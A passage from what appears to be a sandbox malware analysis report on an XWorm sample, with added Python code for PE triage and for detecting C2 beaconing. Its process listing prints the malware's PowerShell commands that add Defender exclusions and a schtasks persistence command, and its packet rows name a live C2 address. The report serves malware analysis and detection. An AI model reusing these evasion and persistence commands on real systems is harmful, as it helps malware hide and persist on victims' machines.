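        IMAGE_BASE, SECTION_ALIGN, FILE_ALIGN,
        4, 0, 0, 0, 4, 0,                            # OS / image / subsystem versions 4.0, as in the sample
        0, TEXT_RVA + SECTION_ALIGN, FILE_ALIGN, 0,  # Win32Version, SizeOfImage, SizeOfHeaders, CheckSum
        2, 0x8540,                                   # GUI; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16,   # stack/heap, LoaderFlags, NumberOfRvaAndSizes
    ) + b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x60, TEXT_RVA, TEXT_RAW_SIZE, TEXT_RAW_PTR,
                       0, 0, 0, 0, 0x60000020)       # CNT_CODE|MEM_EXECUTE|MEM_READ
    headers = (bytes(dos) + b"PE\0\0" + coff + opt + sect).ljust(FILE_ALIGN, b"\0")
    text = bytearray(TEXT_RAW_SIZE)
    # RVA 0x2000: the single IAT slot (mscoree!_CorExeMain), zero on disk, filled by the loader.
    # RVA 0x2008: IMAGE_COR20_HEADER: cb, runtime 2.5, metadata dir (0 here), flags ILONLY, entry token.
    struct.pack_into("<IHHIIII", text, CLR_RVA - TEXT_RVA, CLR_SIZE, 2, 5, 0, 0, 1, 0x06000001)
    # RVA 0x2050: FF 25 <abs32> = jmp dword ptr [0x402000]. The zero bytes after it are what a
    # linear disassembler renders as the run of `add byte ptr [eax], al` seen in the report.
    struct.pack_into("<BBI", text, ENTRY_RVA - TEXT_RVA, 0xFF, 0x25, IMAGE_BASE + IAT_RVA)
    return headers + bytes(text)


def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte, the report's 'Entropy (8bit)' column."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Read just enough of the headers for .NET triage (PE32 only, like the sample)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, *_ = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "rawptr": rawptr, "entropy": entropy(raw),
                         "zlib_complexity": len(zlib.compress(raw)) / len(raw) if raw else 0.0})

    def rva_to_off(rva):
        for s in sections:
            if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
                return rva - s["va"] + s["rawptr"]
        raise ValueError(f"RVA {rva:#x} maps to no section")

    com_rva, com_size = dirs[14] if n_dirs > 14 else (0, 0)
    iat_rva = dirs[12][0] if n_dirs > 12 else 0
    off = rva_to_off(entry_rva)
    stub = data[off:off + 6]
    target = struct.unpack_from("<I", stub, 2)[0] if stub[:2] == b"\xff\x25" else None
    return {"machine": machine, "image_base": image_base, "entry": image_base + entry_rva,
            "managed": com_rva != 0, "clr_header": (com_rva, com_size),
            "entry_is_iat_jmp": target == image_base + iat_rva, "sections": sections}


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print({k: v for k, v in info.items() if k != "sections"})
    for s in info["sections"]:
        print(s)
```

The useful checks are the last two fields: a non-zero COM descriptor directory says the file is managed regardless of what the import table looks like, and an entry stub that is exactly `FF 25` followed by ImageBase + IAT RVA means the native code is only the CLR bootstrap thunk, so the behaviour has to be read from the IL (here, string-decrypting XWorm code), not from a disassembly of the entry point.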
Timestamp                        SID      Signature                                                  Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-10-22T19:31:00.614747+0200  2855924  ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound   1         192.168.2.4  50013        147.185.221.22  43768      TCP
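The Suricata rule above fires on the content of one outbound packet. The packet table that follows shows a second, content-independent signal: the client opens a fresh connection from a new ephemeral port (49759, 49795, 49820, ...) to 147.185.221.22:43768 every five to eight seconds, and each connection is torn down after a short exchange. The following is an added example, not part of the Joe Sandbox report, that reconstructs connections from rows shaped like that table and flags the periodic reconnect pattern. The rows are copied from the table below (the first packets of each client connection plus a few replies) together with one constructed benign flow to 203.0.113.10:443 as a control; the thresholds `min_conns` and `max_cv` are assumptions for the example.

```python
"""Added example: beaconing detection over packet rows shaped like the report's
packet table. Rows are copied from the report plus one constructed control flow."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Columns: timestamp, source port, dest port, source IP, dest IP (tab separated).
# The 203.0.113.10:443 rows are constructed; the others are from the report's table.
SAMPLE_ROWS = """\
Oct 22, 2024 19:30:01.228127956 CEST\t49759\t43768\t192.168.2.4\t147.185.221.22
Oct 22, 2024 19:30:01.233719110 CEST\t43768\t49759\t147.185.221.22\t192.168.2.4
Oct 22, 2024 19:30:02.000000000 CEST\t49700\t443\t192.168.2.4\t203.0.113.10
Oct 22, 2024 19:30:02.010000000 CEST\t443\t49700\t203.0.113.10\t192.168.2.4
Oct 22, 2024 19:30:05.984688997 CEST\t43768\t49759\t147.185.221.22\t192.168.2.4
Oct 22, 2024 19:30:08.861319065 CEST\t49759\t43768\t192.168.2.4\t147.185.221.22
Oct 22, 2024 19:30:08.863071918 CEST\t49795\t43768\t192.168.2.4\t147.185.221.22
Oct 22, 2024 19:30:08.868455887 CEST\t43768\t49795\t147.185.221.22\t192.168.2.4
Oct 22, 2024 19:30:13.708211899 CEST\t49820\t43768\t192.168.2.4\t147.185.221.22
Oct 22, 2024 19:30:13.713629007 CEST\t43768\t49820\t147.185.221.22\t192.168.2.4
Oct 22, 2024 19:30:18.612041950 CEST\t49841\t43768\t192.168.2.4\t147.185.221.22
Oct 22, 2024 19:30:26.266484976 CEST\t49875\t43768\t192.168.2.4\t147.185.221.22
Oct 22, 2024 19:30:34.081058025 CEST\t49914\t43768\t192.168.2.4\t147.185.221.22
Oct 22, 2024 19:30:39.487025023 CEST\t49945\t43768\t192.168.2.4\t147.185.221.22
"""


def parse_ts(text: str) -> float:
    """'Oct 22, 2024 19:30:01.228127956 CEST' -> seconds as a float. The zone suffix is
    dropped because every row carries the same one and only differences are used."""
    stamp, rest = text.split(".", 1)
    frac = rest.split()[0]
    base = datetime.strptime(stamp, "%b %d, %Y %H:%M:%S")
    return base.timestamp() + int(frac) / 10 ** len(frac)


def parse_rows(blob: str) -> list:
    rows = []
    for line in blob.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = line.split("\t")
        rows.append((parse_ts(ts), int(sport), int(dport), sip, dip))
    return rows


def find_beacons(rows: list, min_conns: int = 5, max_cv: float = 0.5) -> dict:
    """Group packets into connections keyed by the 4-tuple, take each connection's first
    packet as its connect time, then score every (client, server, server port) by how
    many connections it has and how regular the gaps between connects are
    (coefficient of variation = stdev / mean; low CV with jitter still passes)."""
    starts = {}
    for ts, sport, dport, sip, dip in sorted(rows):
        if (dip, dport, sip, sport) in starts:   # server->client packet of a known connection
            continue
        starts.setdefault((sip, sport, dip, dport), ts)
    per_server = defaultdict(list)
    for (sip, sport, dip, dport), ts in starts.items():
        per_server[(sip, dip, dport)].append(ts)
    report = {}
    for key, times in per_server.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        cv = pstdev(gaps) / mean(gaps) if len(gaps) >= 2 else None
        report[key] = {
            "connections": len(times),
            "median_gap": median(gaps) if gaps else None,
            "cv": cv,
            "beacon": len(times) >= min_conns and cv is not None and cv <= max_cv,
        }
    return report


if __name__ == "__main__":
    for (client, server, port), r in find_beacons(parse_rows(SAMPLE_ROWS)).items():
        print(f"{client} -> {server}:{port}  {r}")
```

On the copied rows the C2 flow scores seven connections with a median gap of about 6.5 s and a CV near 0.2, so it is flagged, while the single control connection is not. The point of the heuristic is that it needs no payload signature: XWorm's reconnect loop is visible from flow metadata alone, which matters when the channel is encrypted or the ETPRO rule is not deployed. The trade-off is that keep-alive clients and polling agents also reconnect on a schedule, so the thresholds are a starting point for tuning against your own baseline rather than fixed values.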
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 22, 2024 19:30:01.228127956 CEST  49759        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:01.233719110 CEST  43768        49759      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:01.233798027 CEST  49759        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:01.415050030 CEST  49759        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:01.420521021 CEST  43768        49759      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:05.984688997 CEST  43768        49759      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:05.984792948 CEST  49759        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:08.861319065 CEST  49759        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:08.863071918 CEST  49795        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:08.866844893 CEST  43768        49759      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:08.868455887 CEST  43768        49795      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:08.868612051 CEST  49795        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:08.890459061 CEST  49795        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:08.896008015 CEST  43768        49795      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:13.649228096 CEST  43768        49795      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:13.649332047 CEST  49795        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:13.706581116 CEST  49795        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:13.708211899 CEST  49820        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:13.711894989 CEST  43768        49795      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:13.713629007 CEST  43768        49820      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:13.713723898 CEST  49820        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:13.731997967 CEST  49820        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:13.737394094 CEST  43768        49820      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:18.509737968 CEST  43768        49820      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:18.509788990 CEST  49820        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:18.611358881 CEST  49820        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:18.612041950 CEST  49841        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:18.616647959 CEST  43768        49820      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:18.617403984 CEST  43768        49841      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:18.617486000 CEST  49841        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:18.631936073 CEST  49841        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:18.637379885 CEST  43768        49841      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:23.395808935 CEST  43768        49841      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:23.395870924 CEST  49841        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:26.259103060 CEST  49841        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:26.264389038 CEST  43768        49841      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:26.266484976 CEST  49875        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:26.272022963 CEST  43768        49875      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:26.272088051 CEST  49875        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:26.467658043 CEST  49875        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:26.473769903 CEST  43768        49875      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:31.036139011 CEST  43768        49875      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:31.036283016 CEST  49875        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:34.080132961 CEST  49875        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:34.081058025 CEST  49914        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:34.085516930 CEST  43768        49875      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:34.086536884 CEST  43768        49914      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:34.086616039 CEST  49914        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:34.102144957 CEST  49914        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:34.107619047 CEST  43768        49914      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:38.882920980 CEST  43768        49914      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:38.883372068 CEST  49914        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:39.486486912 CEST  49914        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:39.487025023 CEST  49945        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:39.492048025 CEST  43768        49914      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:39.492592096 CEST  43768        49945      147.185.221.22   192.168.2.4
Oct 22, 2024 19:30:39.492666006 CEST  49945        43768      192.168.2.4      147.185.221.22
Oct 22, 2024 19:30:39.505634069 CEST  49945        43768      192.168.2.4      147.185.221.22
                                                  Oct 22, 2024 19:30:39.511142015 CEST4376849945147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.343118906 CEST4376849945147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.343178988 CEST4994543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.924057961 CEST4994543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.924899101 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.929398060 CEST4376849945147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.930249929 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.930430889 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.945211887 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.950936079 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.688060045 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.688200951 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.830300093 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.831125021 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.835874081 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.836421013 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.836519003 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.853002071 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.858407974 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.620877981 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.621007919 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.627439022 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.628459930 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.632917881 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.633785009 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.633877993 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.651772022 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.657382965 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.489356995 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.489516020 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.689543009 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.691128969 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.792728901 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.792742968 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.792902946 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.808676004 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.814191103 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:31:00.614747047 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:31:00.620445013 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:31:04.547914982 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:31:04.547976017 CEST5001343768192.168.2.4147.185.221.22


                                                  Target ID:0
                                                  Start time:13:28:55
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\fjijTlM2tu.exe"
                                                  Imagebase:0x710000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:1
                                                  Start time:13:28:59
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:13:28:59
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:13:29:06
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe'
                                                  Imagebase:0x7ff70f330000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:13:29:06
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:13:29:16
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:13:29:16
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:13:29:33
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:13:29:33
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:13:29:54
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:13:29:54
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:13:29:56
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Imagebase:0x180000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 79%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:13:30:04
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\localsys64.exe"
                                                  Imagebase:0x660000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:13:30:12
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\localsys64.exe"
                                                  Imagebase:0xbe0000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:20.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:6
                                                    Total number of Limit Nodes:0
                                                    execution_graph
                                                    • 4149: 7ffd9b88291d
                                                    • 4150: 7ffd9b88294f RtlSetProcessIsCritical
                                                    • 4149 -> 4150
                                                    • 4152: 7ffd9b882a02
                                                    • 4150 -> 4152
                                                    • 4153: 7ffd9b882e48
                                                    • 4155: 7ffd9b882e51 SetWindowsHookExW
                                                    • 4153 -> 4155
                                                    • 4156: 7ffd9b882f21
                                                    • 4155 -> 4156

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph: function 7ffd9b8812c9-7ffd9b881b6f (rendered graph; basic-block and edge listing omitted). Call targets in the graph: 7ffd9b8804d8 (x8), 7ffd9b8805e8, 7ffd9b880490, 7ffd9b880358, 7ffd9b880368, 7ffd9b880378, 7ffd9b880728, 7ffd9b880860, 7ffd9b880838, 7ffd9b880388, 7ffd9b880398, 7ffd9b8803a8, 7ffd9b880588, 7ffd9b880808.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CAO_^
                                                    • API String ID: 0-3111533842
                                                    • Opcode ID: 16132cf12cad85a9ee4bbc7fa73462ba3ea0aaaabf1c8b34c5b2363a124d7cc8
                                                    • Instruction ID: ac9bee7d130f9e88548e6cd424ace4b73ff2e2ed0d83cc444c1529464f866601
                                                    • Opcode Fuzzy Hash: 16132cf12cad85a9ee4bbc7fa73462ba3ea0aaaabf1c8b34c5b2363a124d7cc8
                                                    • Instruction Fuzzy Hash: CB42D761B29E094FE798FB789865AB977D2FF9C740F5405B9E01EC32D6DE38A8018341

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph: function 7ffd9b889066-7ffd9b889523 (rendered graph; basic-block and edge listing omitted). Call target in the graph: 7ffd9b889524.
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
